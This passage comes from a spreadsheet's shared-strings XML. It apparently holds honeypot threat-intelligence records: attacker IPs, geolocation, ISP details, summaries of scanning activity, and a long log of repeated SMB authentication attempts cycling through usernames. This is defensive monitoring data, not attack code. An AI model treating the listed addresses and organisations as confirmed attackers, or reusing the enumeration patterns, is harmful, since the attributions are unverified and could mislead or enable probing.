    <t>The attacker is scanning for open ports and services on the victim's system, attempting to identify potential vulnerabilities to exploit. They are also trying to establish unauthorized connections to various services such as FTP, HTTP, HTTPS, IMAP, POP3, and SMTP. &amp;&amp; The attackers are conducting reconnaissance and scanning activities, attempting to identify vulnerabilities in various systems and protocols. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting potential weaknesses.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; Reconnaissance</t>
  </si>
  <si>
    <t>efa3771309c845c73fb6ffff8e4002b2</t>
  </si>
  <si>
    <t>117.194.249.23</t>
  </si>
  <si>
    <t>::ffff:75c2:f917</t>
  </si>
  <si>
    <t>e79c36e7c2c75b709fa00f36ea81c8cd</t>
  </si>
  <si>
    <t>121.200.63.162</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>15394&amp;&amp;23</t>
  </si>
  <si>
    <t>Dhaka (Lalbagh)</t>
  </si>
  <si>
    <t>23.717</t>
  </si>
  <si>
    <t>90.3811</t>
  </si>
  <si>
    <t>55828</t>
  </si>
  <si>
    <t>Drik ICT Ltd</t>
  </si>
  <si>
    <t>Drik</t>
  </si>
  <si>
    <t>2010-10-22</t>
  </si>
  <si>
    <t>DRIK-BD</t>
  </si>
  <si>
    <t>::ffff:79c8:3fa2</t>
  </si>
  <si>
    <t>The attacker is attempting to recon and probe various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is likely scanning for vulnerabilities and testing authentication credentials.</t>
  </si>
  <si>
    <t xml:space="preserve"> Vulnerable System Scanning</t>
  </si>
  <si>
    <t>ef666aab0224aa7da4cf3950a5bd03b3</t>
  </si>
  <si>
    <t>67.246.112.138</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-067-246-112-138.res.spectrum.com</t>
  </si>
  <si>
    <t>Oswego</t>
  </si>
  <si>
    <t>5118136</t>
  </si>
  <si>
    <t>13069</t>
  </si>
  <si>
    <t>43.3228</t>
  </si>
  <si>
    <t>-76.4172</t>
  </si>
  <si>
    <t>11351</t>
  </si>
  <si>
    <t>::ffff:43f6:708a</t>
  </si>
  <si>
    <t>5b933d2841ae50e13d29b5ccd27f375b</t>
  </si>
  <si>
    <t>62.150.144.194</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;58660&amp;&amp;58822&amp;&amp;NA</t>
  </si>
  <si>
    <t>Al Asimah</t>
  </si>
  <si>
    <t>Kuwait City (Sharq)</t>
  </si>
  <si>
    <t>285787</t>
  </si>
  <si>
    <t>29.3759</t>
  </si>
  <si>
    <t>47.9931</t>
  </si>
  <si>
    <t>9155</t>
  </si>
  <si>
    <t>Quality Net General Trading &amp; Contracting Company</t>
  </si>
  <si>
    <t>QualityNet Kuwait</t>
  </si>
  <si>
    <t>Qualitynet Co.</t>
  </si>
  <si>
    <t>::ffff:3e96:90c2</t>
  </si>
  <si>
    <t>The attackers are scanning and probing various services on a network, likely for vulnerabilities or to gather information. They are using different protocols such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET.</t>
  </si>
  <si>
    <t>a6307f0be1c7f3e13c5481610468b623</t>
  </si>
  <si>
    <t>103.91.223.83</t>
  </si>
  <si>
    <t>Rajkot (Limda Chowk)</t>
  </si>
  <si>
    <t>360002</t>
  </si>
  <si>
    <t>22.2964</t>
  </si>
  <si>
    <t>70.7984</t>
  </si>
  <si>
    <t>136303</t>
  </si>
  <si>
    <t>Sher Telelink Pvt Ltd</t>
  </si>
  <si>
    <t>2017-05-03</t>
  </si>
  <si>
    <t>SHERTELELINK</t>
  </si>
  <si>
    <t>::ffff:675b:df53</t>
  </si>
  <si>
    <t>The attacker is likely conducting a reconnaissance activity, gathering information about the available services and their configurations on the target network. They are attempting to identify potential vulnerabilities and entry points for further exploitation. &amp;&amp; Here is the analysis of the possible malicious activity:</t>
  </si>
  <si>
    <t>Port scanning and enumeration of various services such as FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and TELNET. &amp;&amp; The attackers are scanning for open ports and services, attempting to exploit them with various credentials and attacks. They are trying to gain unauthorized access to systems, using protocols such as FTP, HTTP, HTTPS, IMAP, POP3, SMB, SMTP, SNMP, and others. The attackers are also probing for weak passwords and exploiting vulnerabilities in systems.</t>
  </si>
  <si>
    <t>34a92f48cc438611fa8a85a19109c6dd</t>
  </si>
  <si>
    <t>103.112.150.12</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>Khulna Division</t>
  </si>
  <si>
    <t>Khulna</t>
  </si>
  <si>
    <t>1336135</t>
  </si>
  <si>
    <t>22.8098</t>
  </si>
  <si>
    <t>89.5644</t>
  </si>
  <si>
    <t>137541</t>
  </si>
  <si>
    <t>Royalnet</t>
  </si>
  <si>
    <t>::ffff:6770:960c</t>
  </si>
  <si>
    <t>c59089e1f5177de07519a0d2c16ee943</t>
  </si>
  <si>
    <t>201.71.6.101</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>23&amp;&amp;3546&amp;&amp;NA</t>
  </si>
  <si>
    <t>Franco da Rocha</t>
  </si>
  <si>
    <t>3462964</t>
  </si>
  <si>
    <t>-23.3217</t>
  </si>
  <si>
    <t>-46.7269</t>
  </si>
  <si>
    <t>270282</t>
  </si>
  <si>
    <t>SIMONE BARBOSA DO NASCIMENTO SOUZA COMUNICAÇÃO</t>
  </si>
  <si>
    <t>::ffff:c947:665</t>
  </si>
  <si>
    <t>3bf7b6a36fc75a52e14019e03706ebb5</t>
  </si>
  <si>
    <t>122.117.95.118</t>
  </si>
  <si>
    <t>122-117-95-118.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;54459&amp;&amp;52334&amp;&amp;55350</t>
  </si>
  <si>
    <t>::ffff:7a75:5f76</t>
  </si>
  <si>
    <t>e928f13348c3875926632ef5f14221b7</t>
  </si>
  <si>
    <t>180.222.175.86</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>-33.8748</t>
  </si>
  <si>
    <t>38333</t>
  </si>
  <si>
    <t>Symbio Networks Pty Ltd</t>
  </si>
  <si>
    <t>Telcoinabox Australia</t>
  </si>
  <si>
    <t>Telcoinabox Operations Pty Ltd</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (180.222.175.86,59132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (angel,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60803)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61993)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63190)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64359)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49193)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50418)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51557)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52781)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53982)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55138)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56318)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57512)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58676)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59936)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61126)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,62274)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63473)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49435)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50632)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51804)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52983)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,62875)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64047)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,65252)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50091)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52456)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (anita,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59564)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60763)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61903)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,63118)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,64328)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,65491)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50301)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51503)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49718)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dusko,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dusko,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,49992)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50135)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50381)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50563)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50682)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50795)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50883)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50998)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51083)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51147)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51279)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52934)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52989)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53249)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53367)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53494)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53668)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53779)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53897)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54017)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54072)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54314)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54375)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54495)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55552)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55707)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55785)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55962)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56081)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56293)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56380)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56538)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56625)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56699)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56803)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56959)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57167)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57264)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57349)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57466)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57533)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57610)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57721)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57819)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57930)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58225)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58339)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58394)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58571)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58793)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58882)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58973)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59067)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59185)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dean,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59320)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58073)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sales,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58267)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58366)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58479)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58562)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58679)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58772)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58875)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58950)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59051)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59168)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59268)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59362)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59462)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59561)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59651)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60090)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60191)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60302)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60394)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60731)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60846)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61038)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61140)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61240)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61340)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (samm,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55224)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55379)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55485)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55591)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55676)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55880)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection 